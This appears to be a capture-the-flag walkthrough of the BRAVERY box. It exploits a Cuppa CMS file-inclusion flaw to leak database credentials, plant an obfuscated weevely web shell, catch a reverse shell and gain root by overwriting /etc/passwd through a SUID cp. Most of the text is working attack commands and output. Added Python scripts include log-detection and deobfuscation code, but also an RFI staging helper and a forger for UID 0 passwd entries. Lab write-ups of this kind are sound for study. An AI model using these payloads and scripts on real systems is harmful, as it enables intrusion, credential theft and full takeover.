PD9waHAgCgljbGFzcyBDb25maWd1cmF0aW9uewoJCXB1YmxpYyAkaG9zdCA9ICJsb2NhbGhvc3QiOwoJCXB1YmxpYyAkZGIgPSAiYnJhdmVyeSI7CgkJcHVibGljICR1c2VyID0gInJvb3QiOwoJCXB1YmxpYyAkcGFzc3dvcmQgPSAicjAwdGlzYXdlczBtZSI7CgkJcHVibGljICR0YWJsZV9wcmVmaXggPSAiY3VfIjsKCQlwdWJsaWMgJGFkbWluaXN0cmF0b3JfdGVtcGxhdGUgPSAiZGVmYXVsdCI7CgkJcHVibGljICRsaXN0X2xpbWl0ID0gMjU7CgkJcHVibGljICR0b2tlbiA9ICJPQnFJUHFsRldmM1giOwoJCXB1YmxpYyAkYWxsb3dlZF9leHRlbnNpb25zID0gIiouYm1wOyAqLmNzdjsgKi5kb2M7ICouZ2lmOyAqLmljbzsgKi5qcGc7ICouanBlZzsgKi5vZGc7ICoub2RwOyAqLm9kczsgKi5vZHQ7ICoucGRmOyAqLnBuZzsgKi5wcHQ7ICouc3dmOyAqLnR4dDsgKi54Y2Y7ICoueGxzOyAqLmRvY3g7ICoueGxzeCI7CgkJcHVibGljICR1cGxvYWRfZGVmYXVsdF9wYXRoID0gIm1lZGlhL3VwbG9hZHNGaWxlcyI7CgkJcHVibGljICRtYXhpbXVtX2ZpbGVfc2l6ZSA9ICI1MjQyODgwIjsKCQlwdWJsaWMgJHNlY3VyZV9sb2dpbiA9IDA7CgkJcHVibGljICRzZWN1cmVfbG9naW5fdmFsdWUgPSAiZ29vZHRlY2giOwoJCXB1YmxpYyAkc2VjdXJlX2xvZ2luX3JlZGlyZWN0ID0gImRvb3JzaGVsbC5qcGciOwoJfSAKPz4K
Decoding the above (https://www.base64decode.org/):
<?php
class Configuration{
public $host = "localhost";
public $db = "bravery";
public $user = "root";
public $password = "r00tisawes0me";
public $table_prefix = "cu_";
public $administrator_template = "default";
public $list_limit = 25;
public $token = "OBqIPqlFWf3X";
public $allowed_extensions = "*.bmp; *.csv; *.doc; *.gif; *.ico; *.jpg; *.jpeg; *.odg; *.odp; *.ods; *.odt; *.pdf; *.png; *.ppt; *.swf; *.txt; *.xcf; *.xls; *.docx; *.xlsx";
public $upload_default_path = "media/uploadsFiles";
public $maximum_file_size = "5242880";
public $secure_login = 0;
public $secure_login_value = "goodtech";
public $secure_login_redirect = "doorshell.jpg";
}
?>
DB name: bravery
user: root
password: r00tisawes0me
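The three request shapes used above (a remote URL, a `../` traversal and a `php://filter` wrapper against `alertConfigField.php`) are what a defender would look for in web server access logs. The following is an added example, not code from the write-up's author or from Cuppa CMS; it generalises in two ways: it checks every query parameter rather than only `urlConfig`, and it decodes once more to catch double-encoded payloads. The log lines are constructed for the example.

```python
"""Flag file-inclusion probes against PHP include parameters in access logs.

Added example for this write-up, not code from the page's author or from
Cuppa CMS. It recognises the three request shapes used against
alertConfigField.php above (a remote URL, a ../ traversal and a
php://filter wrapper) and generalises in two ways: it checks every query
parameter rather than only urlConfig, and it decodes a second time to catch
double-encoded payloads. The log lines are constructed for the example.
"""
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, unquote, urlsplit

SAMPLE_LOG = """\
192.168.10.10 - - [23/Mar/2021:16:40:01 +0900] "GET /genevieve/cuppaCMS/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd HTTP/1.1" 200 1243
192.168.10.10 - - [23/Mar/2021:16:41:12 +0900] "GET /genevieve/cuppaCMS/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php HTTP/1.1" 200 1180
192.168.10.10 - - [23/Mar/2021:16:42:30 +0900] "GET /genevieve/cuppaCMS/alerts/alertConfigField.php?urlConfig=http://192.168.10.10:7979/reverse.php HTTP/1.1" 200 0
192.168.10.10 - - [23/Mar/2021:16:43:05 +0900] "GET /genevieve/cuppaCMS/alerts/alertConfigField.php?urlConfig=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 1243
192.168.10.22 - - [23/Mar/2021:16:44:00 +0900] "GET /genevieve/cuppaCMS/index.php?page=home HTTP/1.1" 200 22963
192.168.10.22 - - [23/Mar/2021:16:45:17 +0900] "GET /genevieve/cuppaCMS/index.php?page=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1243
"""

# Common log format: client, ident, user, [timestamp], "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"'
)

REMOTE_SCHEMES = {"http", "https", "ftp", "ftps"}
# PHP stream wrappers that turn include() into a file read or code execution
PHP_WRAPPERS = {"php", "data", "expect", "phar", "zip", "glob", "compress.zlib", "compress.bzip2"}


def classify(value: str) -> Optional[str]:
    """Name the inclusion technique a parameter value looks like, or None."""
    # parse_qs already removed one layer of percent-encoding; decoding again
    # exposes %252e%252e%252f-style double encoding.
    decoded = unquote(value)
    scheme = urlsplit(decoded).scheme.lower()
    if scheme in REMOTE_SCHEMES:
        return "remote-include"
    if scheme in PHP_WRAPPERS:
        return "php-wrapper"
    if "../" in decoded or "..\\" in decoded:
        return "traversal"
    return None


def scan_log(text: str) -> List[Dict[str, object]]:
    """Return one hit per suspicious query parameter found in the log."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        for name, values in parse_qs(query, keep_blank_values=True).items():
            for value in values:
                kind = classify(value)
                if kind:
                    hits.append({"line": lineno, "client": m.group("client"),
                                 "param": name, "kind": kind, "value": value})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f'line {hit["line"]}: {hit["client"]} {hit["kind"]:15} {hit["param"]}={hit["value"]}')
```

The wrapper check runs before the traversal check on purpose: `php://filter/...resource=../Configuration.php` contains `../` too, but the wrapper is the more specific finding, and a `php://filter` read of `Configuration.php` is exactly how the database password above leaked.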
Chapter 4: Penetration
Through this vulnerability a reverse shell can be uploaded (RFI).
The exercise is done in two ways.
Method 1)
Generate the attack code with weevely, then connect
1. Generate the attack code with weevely.
2. Start the Python web handler.
3. Connect with weevely.
1. Generate the payload with weevely
┌──(root💀takudaddy)-[/var/www/html]
└─# weevely generate freepass reverse.php
Generated 'reverse.php' with password 'freepass' of 781 byte size.
┌──(root💀takudaddy)-[/var/www/html]
└─# cat reverse.php
<?php
$C='atchd*("/$khd*d*(.+)$kf/",@fd*ile_getd*_cod*ntents(d*"php://id*d*nput"),$m)=d*';
$J='m[1])d*,$k)))d*;$d*o=@od*b_getd*_cod*ntents();d*@ob_ed*nd_clead*n();$d*r=';
$v='$k="5b9a8d*069";d*$kh="d3d*3fed*9812dc8"d*;$kd*f="310ebfd*f0a31d*5d*";$pd*=';
$G='=d*1d*) {@ob_start();d*@evd*al(@gzud*ncompressd*(@x(@bd*ase6d*4_decode(d*$';
$a=str_replace('bP','','bPbPcreatbPebP_fubPnbPction');
$U='*trlen(d*$t);$o=""d*;for($id*=0;$i<$d*l;){ford*(d*$j=0;($d*jd*<d*$c&&$i<$l';
$c='"wvZd*uXeh9jVJgrod*lp";functid*on x($td*,d*$k){$c=std*rlen(d*$k);$l=sd*d';
$P=');$j+d*+,$i++){$o.d*=$t{d*$i}^$k{d*$j};d*}}retd*urn $od*;}if (d*@preg_m';
$m='@basd*e64_ed*nd*code(@x(@gzcomd*press($od*),$k));d*print(d*"$pd*$kh$r$kf");}';
$L=str_replace('d*','',$v.$c.$U.$P.$C.$G.$J.$m);
$H=$a('',$L);$H();
?>
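An analyst who finds a file like the `reverse.php` above on a web server needs to know what it does before deciding how to respond. It hides its code by sprinkling the filler `d*` through eight string chunks, concatenating them and calling `str_replace('d*', '', ...)` at run time (the function name `create_function` is hidden the same way with `bP`). The following is an added example, not code from the write-up's author or from the weevely project: it replays that single transformation offline on the chunks copied verbatim from the listing above, and pulls out the constants a detection rule would key on.

```python
"""Recover the logic of the weevely stub above by undoing its string filler.

Added example, not from the page's author or the weevely project. The stub
hides its code by sprinkling the filler "d*" through eight string chunks,
concatenating them and calling str_replace('d*', '', ...) at run time (the
function name create_function is hidden the same way with "bP"). Replaying
that single transformation offline yields readable PHP from which an analyst
can pull the constants a detection rule would key on.
"""
import re
from typing import Dict, List

# The eight chunks copied verbatim from reverse.php, in the order the stub
# concatenates them ($v.$c.$U.$P.$C.$G.$J.$m).
STUB_CHUNKS: List[str] = [
    '$k="5b9a8d*069";d*$kh="d3d*3fed*9812dc8"d*;$kd*f="310ebfd*f0a31d*5d*";$pd*=',
    '"wvZd*uXeh9jVJgrod*lp";functid*on x($td*,d*$k){$c=std*rlen(d*$k);$l=sd*d',
    '*trlen(d*$t);$o=""d*;for($id*=0;$i<$d*l;){ford*(d*$j=0;($d*jd*<d*$c&&$i<$l',
    ');$j+d*+,$i++){$o.d*=$t{d*$i}^$k{d*$j};d*}}retd*urn $od*;}if (d*@preg_m',
    'atchd*("/$khd*d*(.+)$kf/",@fd*ile_getd*_cod*ntents(d*"php://id*d*nput"),$m)=d*',
    '=d*1d*) {@ob_start();d*@evd*al(@gzud*ncompressd*(@x(@bd*ase6d*4_decode(d*$',
    'm[1])d*,$k)))d*;$d*o=@od*b_getd*_cod*ntents();d*@ob_ed*nd_clead*n();$d*r=',
    '@basd*e64_ed*nd*code(@x(@gzcomd*press($od*),$k));d*print(d*"$pd*$kh$r$kf");}',
]
CREATE_FUNCTION_CHUNK = "bPbPcreatbPebP_fubPnbPction"


def strip_filler(chunks: List[str], filler: str) -> str:
    """Join the chunks first, then drop the filler, exactly as the stub does.

    The order matters: some filler tokens straddle a chunk boundary (the
    "sd*" + "d*trlen" pair that hides strlen), so removing per chunk would
    leave garbage behind."""
    return "".join(chunks).replace(filler, "")


def extract_constants(php: str) -> Dict[str, str]:
    """Pull the four string constants the stub defines at the top."""
    return dict(re.findall(r'\$(kh|kf|k|p)="([^"]*)"', php))


def response_marker_regex(consts: Dict[str, str]) -> str:
    """Regex for the framing the stub wraps around every request and reply.

    The recovered code matches the request body against /$kh(.+)$kf/ and
    prints "$p$kh<payload>$kf" back, so these two hex markers appear in both
    directions of the channel and are usable as a log or IDS signature."""
    return re.escape(consts["kh"]) + r"(.+)" + re.escape(consts["kf"])


if __name__ == "__main__":
    php = strip_filler(STUB_CHUNKS, "d*")
    print(strip_filler([CREATE_FUNCTION_CHUNK], "bP"))  # the hidden function name
    print(php)
    print(extract_constants(php))
```

The recovered PHP shows the stub reading `php://input`, XOR-decoding and decompressing whatever sits between the two markers, running it through `eval`, and returning the captured output framed the same way. For a host-based check, the combination of `str_replace` building a string that is then handed to `create_function` is itself a strong indicator, independent of the particular filler token.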
2. After generating it, run the Python web handler
┌──(root💀takudaddy)-[/var/www/html]
└─# python3 -m http.server 7979 (# python -m SimpleHTTPServer 7979 )
Serving HTTP on 0.0.0.0 port 7979 (http://0.0.0.0:7979/)
3. Open another terminal and connect with weevely:
┌──(root💀takudaddy)-[/var/www/html]
└─# weevely http://192.168.10.14/genevieve/cuppaCMS/alerts/alertConfigField.php?urlConfig=http://192.168.10.10:7979/reverse.php freepass
[+] weevely 4.0.1
[+] Target: 192.168.10.14
[+] Session: /root/.weevely/sessions/192.168.10.14/alertConfigField_11.session
[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.
weevely> ls
alertConfigField.php
alertIFrame.php
alertImage.php
defaultAlert.php
bravery:/var/www/html/genevieve/cuppaCMS/alerts $ id
uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0
bravery:/var/www/html/genevieve/cuppaCMS/alerts $ whoami
apache
bravery:/var/www/html/genevieve/cuppaCMS/alerts $ ls
alertConfigField.php
alertIFrame.php
alertImage.php
defaultAlert.php
bravery:/var/www/html/genevieve/cuppaCMS/alerts $ cd
Failed cd 'http://192.168.10.10:7979': no such directory or permission denied
bravery:/var/www/html/genevieve/cuppaCMS/alerts $ cd ..
bravery:/var/www/html/genevieve/cuppaCMS $ cd /
bravery:/ $ ls
bin
boot
dev
etc
home
lib
lib64
local.txt
media
mnt
opt
proc
root
run
samba
sbin
srv
sys
tmp
usr
var
bravery:/ $ cat local.txt
Congratulations on obtaining a user shell. :)
bravery:/ $
Method 2)
1. Start the local apache2 server
2. Place the attack file in the local /var/www/html
3. Start a local listener (nc / msfconsole)
4. Start the local Python simple HTTP request handler
5. Trigger the attack file through the target's vulnerability
1. Start the Apache server
[root@takudaddy /var/www/html]# systemctl enable --now apache2
Synchronizing state of apache2.service with SysV service script with /lib/systemd/systemd-sysv-install.
Executing: /lib/systemd/systemd-sysv-install enable apache2
[root@takudaddy /var/www/html]# systemctl status apache2
● apache2.service - The Apache HTTP Server
Loaded: loaded (/lib/systemd/system/apache2.service; enabled; vendor preset: disab>
Active: active (running) since Tue 2021-03-23 22:25:09 KST; 8min ago
Docs: https://httpd.apache.org/docs/2.4/
Main PID: 1848 (apache2)
Tasks: 7 (limit: 9467)
Memory: 24.5M
CPU: 74ms
CGroup: /system.slice/apache2.service
├─1848 /usr/sbin/apache2 -k start
├─1849 /usr/sbin/apache2 -k start
├─1850 /usr/sbin/apache2 -k start
├─1851 /usr/sbin/apache2 -k start
├─1852 /usr/sbin/apache2 -k start
├─1853 /usr/sbin/apache2 -k start
└─2194 /usr/sbin/apache2 -k start
3월 23 22:25:09 takudaddy systemd[1]: Starting The Apache HTTP Server...
3월 23 22:25:09 takudaddy apachectl[1847]: AH00557: apache2: apr_sockaddr_info_get() f>
3월 23 22:25:09 takudaddy apachectl[1847]: AH00558: apache2: Could not reliably determ>
3월 23 22:25:09 takudaddy systemd[1]: Started The Apache HTTP Server.
2. Copy and edit the attack code
[root@takudaddy /var/www/html]#
[root@takudaddy /var/www/html]# cp /usr/share/webshells/php/php-reverse-shell.php /var/www/html
[root@takudaddy /var/www/html]# ls
index.html index.nginx-debian.html php-reverse-shell.php reverse_shell.php
[root@takudaddy /var/www/html]# vi php-reverse-shell.php
The attack code is /usr/share/webshells/php/php-reverse-shell.php, used as-is apart from the two values near the top of the file: $ip must be our address and $port the callback port (7979 below).
Then start the listener and, through the target's vulnerability, point the URL parameter at the local PHP attack file; the shell connects back.
3. Start the listener
┌──(root💀takudaddy)-[/var/www/html]
└─# nc -lvp 7979
listening on [any] 7979 ...
4. Put the attack file path in the URL
http://192.168.10.14/genevieve/cuppaCMS/alerts/alertConfigField.php?urlConfig=http://192.168.10.4/php-reverse-shell.php
5. Check the connection on the listener
192.168.10.10: inverse host lookup failed: Unknown host
connect to [192.168.10.10] from (UNKNOWN) [192.168.10.10] 41012
Linux takudaddy 5.10.0-kali3-amd64 #1 SMP Debian 5.10.13-1kali1 (2021-02-08) x86_64 GNU/Linux
21:36:27 up 8 min, 1 user, load average: 0.09, 0.09, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root tty7 :0 21:28 8:06 2.07s 2.07s /usr/lib/xorg/Xorg :0 -seat seat0 -auth /var/run/lightdm/root/:0 -nolisten tcp vt7 -novtswitch
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Success!!!!???
That was the first impression, but something is off. We have a shell, but it is not on the target: the banner reads Linux takudaddy, the user is www-data, and the connect line shows our box connecting to our box. The payload was fetched from our own Apache on port 80, which runs PHP itself, so php-reverse-shell.php executed locally and the reverse connection came from 192.168.10.10 instead of from the target. The raw PHP source never reached the target because the Python HTTP handler, which serves the file as plain text, was left out of the chain.
Start the listener again and, this time, start the Python handler as well.
A quick note on the ports, since they are easy to mix up:
the payload's callback port is 7979, so the listener (nc) must also use 7979;
the Python web handler only serves the file, so it gets its own port, 4444;
and the attack file path in the URL must carry that port after the IP, :4444.
1. Check the attack code, then start the nc listener
┌──(root💀takudaddy)-[/var/www/html]
└─# ls
index.html index.nginx-debian.html php-reverse-shell.php reverse.php
┌──(root💀takudaddy)-[/var/www/html]
└─# nc -lvp 7979
listening on [any] 7979 ...
2. Open another terminal and start the Python web handler
┌──(root💀takudaddy)-[/var/www/html]
└─# python -m SimpleHTTPServer 4444 (# python3 -m http.server 4444)
Serving HTTP on 0.0.0.0 port 4444 ...
3. Open the URL in the browser
http://192.168.10.14/genevieve/cuppaCMS/alerts/alertConfigField.php?urlConfig=http://192.168.10.10:4444/php-reverse-shell.php
Output on the listener terminal once the connection comes in:
┌──(root💀takudaddy)-[/var/www/html]
└─# nc -lvp 7979
listening on [any] 7979 ...
192.168.10.14: inverse host lookup failed: Unknown host
connect to [192.168.10.10] from (UNKNOWN) [192.168.10.14] 36470
Linux bravery 3.10.0-862.3.2.el7.x86_64 #1 SMP Mon May 21 23:36:36 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
09:40:11 up 6 min, 0 users, load average: 0.02, 0.25, 0.17
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0
sh: no job control in this shell
sh-4.2$ ls
ls
bin
boot
dev
etc
home
lib
lib64
local.txt
media
mnt
opt
proc
root
run
samba
sbin
srv
sys
tmp
usr
var
sh-4.2$ whoami
whoami
apache
sh-4.2$ python -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'
bash-4.2$ whoami
whoami
apache
bash-4.2$ ls
ls
bin dev home lib64 media opt root samba srv tmp var
boot etc lib local.txt mnt proc run sbin sys usr
bash-4.2$ cat local.txt
cat local.txt
Congratulations on obtaining a user shell. :)
Foothold obtained!
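The staging step of method 2, as an added example (not the walkthrough's own tooling, nor weevely's): it builds the urlConfig trigger URL from its parts so the listener port and the file-server port cannot be mixed up, runs the equivalent of python -m http.server on a background thread, and performs the pre-flight check the failed first attempt was missing, namely that the staging URL returns PHP source rather than executed output. The target and attacker addresses are the walkthrough's; the function names and the stand-in payload file are mine and are constructed for the demo.

```python
"""Build the cuppaCMS urlConfig RFI URL and verify the staging server hands out
PHP *source*. Added example for this walkthrough, not the page's or weevely's
own code. Function names and the stand-in payload are placeholders.
"""
import functools
import http.server
import os
import socketserver
import tempfile
import threading
import urllib.parse
import urllib.request

# Vulnerable script and parameter from the walkthrough; everything else is configurable.
RFI_PATH = "/genevieve/cuppaCMS/alerts/alertConfigField.php"


def build_rfi_url(target, staging_host, staging_port, payload_name):
    """The URL the browser (or weevely) requests: the target's PHP fetches and
    include()s whatever the staging server returns for urlConfig."""
    remote = f"http://{staging_host}:{staging_port}/{payload_name}"
    return f"http://{target}{RFI_PATH}?" + urllib.parse.urlencode({"urlConfig": remote})


def serve_directory(directory, port=0):
    """Equivalent of `python -m http.server` on a background thread.
    port=0 lets the OS pick a free port; returns (server, chosen_port)."""
    handler = functools.partial(http.server.SimpleHTTPRequestHandler, directory=directory)
    srv = socketserver.TCPServer(("127.0.0.1", port), handler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


def staging_serves_source(url):
    """Pre-flight check: fetch the payload URL and confirm PHP text comes back.
    A server that executes PHP (Apache + mod_php) returns the script's output
    instead, so the shell would run, and call back, from our own host, which is
    exactly what happened in the failed first attempt."""
    with urllib.request.urlopen(url, timeout=5) as resp:
        head = resp.read(64)
    return head.lstrip().startswith(b"<?php")


def demo(listener_port=7979):
    """Stage a constructed stand-in payload locally and run the check."""
    staging_dir = tempfile.mkdtemp()
    name = "php-reverse-shell.php"
    with open(os.path.join(staging_dir, name), "w") as fh:
        # Constructed stand-in, not pentestmonkey's shell: only the two values
        # that have to be edited in the real file are shown.
        fh.write(f"<?php\n$ip = '192.168.10.10';\n$port = {listener_port};\n")
    srv, port = serve_directory(staging_dir)
    try:
        ok = staging_serves_source(f"http://127.0.0.1:{port}/{name}")
    finally:
        srv.shutdown()
        srv.server_close()
    return ok, build_rfi_url("192.168.10.14", "192.168.10.10", port, name)


if __name__ == "__main__":
    ok, url = demo()
    print("staging serves source:", ok)
    print("trigger:", url)
```

Run the check against your real staging URL before touching the target; if it returns False, the file is being executed on your side, not served, and the callback will again come from your own box.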
Chapter 5: privilege escalation
Steps after the foothold:
sudo /bin/bash (failed)
sudo -l (failed)
switching to david (failed)
search for usable binaries
confirmed that cp is SUID root
confirmed that /etc/passwd is readable
Plan: on our box, add a new UID 0 user to a passwd file >
fetch that file into the target's /tmp >
use the SUID cp to copy it over the target's /etc/passwd >
switch user.
A caveat on the file that gets copied: the steps below push our own Kali /etc/passwd across, which replaces every account on the target (apache, david, rick and the service users). The same trick works more cleanly by pulling the target's /etc/passwd, appending the forged line, and copying that back, so nothing else on the box breaks.
┌──(root💀takudaddy)-[/var/www/html]
└─# nc -lvp 7979
listening on [any] 7979 ...
192.168.10.14: inverse host lookup failed: Unknown host
connect to [192.168.10.10] from (UNKNOWN) [192.168.10.14] 49540
Linux bravery 3.10.0-862.3.2.el7.x86_64 #1 SMP Mon May 21 23:36:36 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
10:37:29 up 3 min, 0 users, load average: 2.68, 1.21, 0.48
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0
sh: no job control in this shell
sh-4.2$ whoami
whoami
apache
sh-4.2$ python -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'
bash-4.2$
bash-4.2$ cd home
cd home
bash-4.2$ ls -al
ls -al
total 0
drwxr-xr-x. 4 root root 31 Dec 25 2018 .
dr-xr-xr-x. 18 root root 254 Sep 28 2018 ..
drwx------. 14 david david 279 Sep 29 2018 david
drwx------. 3 rick rick 78 Jul 10 2018 rick
bash-4.2$ su david
su david
Password: qwertyuioplkjhgfdsazxcvbnm
su: Authentication failure
bash-4.2$ su David
su David
su: user David does not exist
2. Look for SUID binaries
bash-4.2$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/bin/cp
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/fusermount
/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/mount
/usr/bin/su
/usr/bin/umount
/usr/bin/Xorg
/usr/bin/pkexec
/usr/bin/crontab
/usr/bin/passwd
/usr/bin/ksu
/usr/bin/at
/usr/bin/staprun
/usr/sbin/pam_timestamp_check
/usr/sbin/unix_chkpwd
/usr/sbin/usernetctl
/usr/sbin/userhelper
/usr/sbin/mount.nfs
/usr/lib/polkit-1/polkit-agent-helper-1
/usr/libexec/dbus-1/dbus-daemon-launch-helper
/usr/libexec/flatpak-bwrap
/usr/libexec/sssd/krb5_child
/usr/libexec/sssd/ldap_child
/usr/libexec/sssd/selinux_child
/usr/libexec/sssd/proxy_child
/usr/libexec/qemu-bridge-helper
/usr/libexec/spice-gtk-x86_64/spice-client-glib-usb-acl-helper
/usr/libexec/abrt-action-install-debuginfo-to-abrt-cache
3. Confirm /etc/passwd is readable
bash-4.2$ cat /etc/passwd
cat /etc/passwd
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
(capture truncated; only the bin and daemon entries are legible, the rest of the file is omitted)
4. Create a new user on our box (two ways)
4-1) Generate the password hash with openssl
┌──(root💀takudaddy)-[~]
└─# openssl passwd -1 -salt takudaddy taku    (ID: takudaddy / PW: taku)
$1$takudadd$KETef9oIkYFX0zLAs6XjM.
(MD5-crypt salts are at most 8 characters, so "takudaddy" is cut to "takudadd" in the hash.)
Written as a passwd line:
takudaddy:$1$takudadd$KETef9oIkYFX0zLAs6XjM.:0:0:root:/root:/bin/bash
4-2) Generate the password hash with Python
┌──(root💀takudaddy)-[~]
└─# python -c 'import crypt;print(crypt.crypt("taku","taku"))'    (ID: taku / PW: taku)
ta0LWDW4m3OdU
(A two-character salt selects traditional DES crypt: only the first two salt characters, "ta", and only the first 8 characters of the password are used. The password is "taku", not "takutaku". The crypt module is deprecated since Python 3.11 and removed in 3.13.)
Written as a passwd line:
taku:ta0LWDW4m3OdU:0:0:root:/root:/bin/bash
┌──(root💀takudaddy)-[~]
└─# tail -2 /etc/passwd
takudaddy:$1$takudadd$KETef9oIkYFX0zLAs6XjM.:0:0:root:/root:/bin/bash
taku:ta0LWDW4m3OdU:0:0:root:/root:/bin/bash
5. Copy the passwd file into /var/www/html (served by the local Apache on port 80)
┌──(root💀takudaddy)-[/var/www/html]
└─# cp /etc/passwd .
┌──(root💀takudaddy)-[/var/www/html]
└─# ls
index.html passwd reverse.php
index.nginx-debian.html php-reverse-shell.php
6. On the target, download the passwd file into /tmp and copy it over /etc/passwd (cp is SUID root, so it can overwrite the root-owned file)
sh-4.2$ cd /tmp
cd /tmp
sh-4.2$ pwd
pwd
/tmp
sh-4.2$ which wget
which wget
/usr/bin/wget
sh-4.2$ wget http://192.168.10.10/passwd
wget http://192.168.10.10/passwd
--2021-03-24 10:55:25-- http://192.168.10.10/passwd
Connecting to 192.168.10.10:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3153 (3.1K) [application/octet-stream]
Saving to: 'passwd'
0K ... 100% 904M=0s
2021-03-24 10:55:25 (904 MB/s) - 'passwd' saved [3153/3153]
sh-4.2$ ls
ls
passwd
sh-4.2$ tail -2 passwd
tail -2 passwd
takudaddy:$1$takudadd$KETef9oIkYFX0zLAs6XjM.:0:0:root:/root:/bin/bash
taku:ta0LWDW4m3OdU:0:0:root:/root:/bin/bash
sh-4.2$ cp passwd /etc/passwd
cp passwd /etc/passwd
7. Switch user
sh-4.2$ su takudaddy
su takudaddy
Password: taku
id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:httpd_t:s0
python -c 'import pty;pty.spawn("/bin/bash")'
[root@bravery tmp]#
[root@bravery tmp]# cd /root
cd /root
[root@bravery ~]# ls
ls
Desktop Downloads Pictures Templates anaconda-ks.cfg ossec-hids-2.8
Documents Music Public Videos author-secret.txt proof.txt
[root@bravery ~]# cat proof.txt
cat proof.txt
Congratulations on rooting BRAVERY. :)
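The hash generation of steps 4-1 and 4-2 and the passwd rewrite of steps 5 and 6, as one added example (not the walkthrough's own tooling): a pure-Python MD5-crypt that reproduces the openssl passwd -1 output above, including the 8-character salt truncation, without needing openssl or the deprecated crypt module, plus a merge that appends the forged UID 0 line to the target's own passwd content instead of replacing the whole file with ours. The passwd content in the block is constructed, not the box's real file, and the function names are mine.

```python
"""Forge a UID-0 /etc/passwd entry for the SUID-cp technique (added example).

Re-implements the MD5-crypt ($1$) hash that `openssl passwd -1` produces so the
entry can be built without openssl or the deprecated `crypt` module, then appends
it to a copy of the *target's* passwd file rather than shipping the attacker's own.
Sample passwd content below is constructed, not taken from the box.
"""
import hashlib

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _to64(value, count):
    """crypt(3)-style base64: emit `count` chars, low 6 bits first."""
    out = ""
    for _ in range(count):
        out += ITOA64[value & 0x3F]
        value >>= 6
    return out


def md5crypt(password, salt):
    """MD5-crypt as in FreeBSD/glibc; salt is cut to 8 chars like openssl and crypt(3)."""
    pw = password.encode()
    salt = salt[:8].encode()
    magic = b"$1$"
    ctx = hashlib.md5(pw + magic + salt)
    alt = hashlib.md5(pw + salt + pw).digest()
    for left in range(len(pw), 0, -16):
        ctx.update(alt[: min(16, left)])
    bits = len(pw)
    while bits:  # one byte per bit of the password length: NUL or pw[0]
        ctx.update(b"\0" if bits & 1 else pw[:1])
        bits >>= 1
    final = ctx.digest()
    for i in range(1000):  # stretching rounds, mixing pw/salt/previous digest
        c = hashlib.md5()
        c.update(pw if i & 1 else final)
        if i % 3:
            c.update(salt)
        if i % 7:
            c.update(pw)
        c.update(final if i & 1 else pw)
        final = c.digest()
    enc = ""
    for a, b, c in ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)):
        enc += _to64((final[a] << 16) | (final[b] << 8) | final[c], 4)
    enc += _to64(final[11], 2)
    return "$1$" + salt.decode() + "$" + enc


def passwd_entry(user, password, salt):
    """The line the walkthrough appends: hash in field 2 (so /etc/shadow is
    bypassed), UID and GID 0, root's home and a login shell."""
    return f"{user}:{md5crypt(password, salt)}:0:0:root:/root:/bin/bash"


def add_root_entry(passwd_text, user, password, salt):
    """Append a UID-0 entry to the target's own passwd content.

    Appending, rather than replacing the file with the attacker's /etc/passwd,
    keeps every existing account so services and the foothold user keep working.
    """
    lines = passwd_text.rstrip("\n").split("\n")
    for line in lines:
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"malformed passwd line: {line!r}")
        if fields[0] == user:
            raise ValueError(f"user {user!r} already exists")
    lines.append(passwd_entry(user, password, salt))
    return "\n".join(lines) + "\n"


# Constructed stand-in for the target's /etc/passwd (not the real file from the box).
SAMPLE_TARGET_PASSWD = """root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
david:x:1000:1000::/home/david:/bin/bash
rick:x:1001:1001::/home/rick:/bin/bash
"""

if __name__ == "__main__":
    print(add_root_entry(SAMPLE_TARGET_PASSWD, "takudaddy", "taku", "takudaddy"), end="")
```

In practice: cat /etc/passwd on the target, feed that text to add_root_entry, host the result, fetch it into /tmp and cp it over /etc/passwd exactly as in step 6; the hash for "taku" with salt "takudaddy" comes out as the same $1$takudadd$... string openssl printed above.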
Done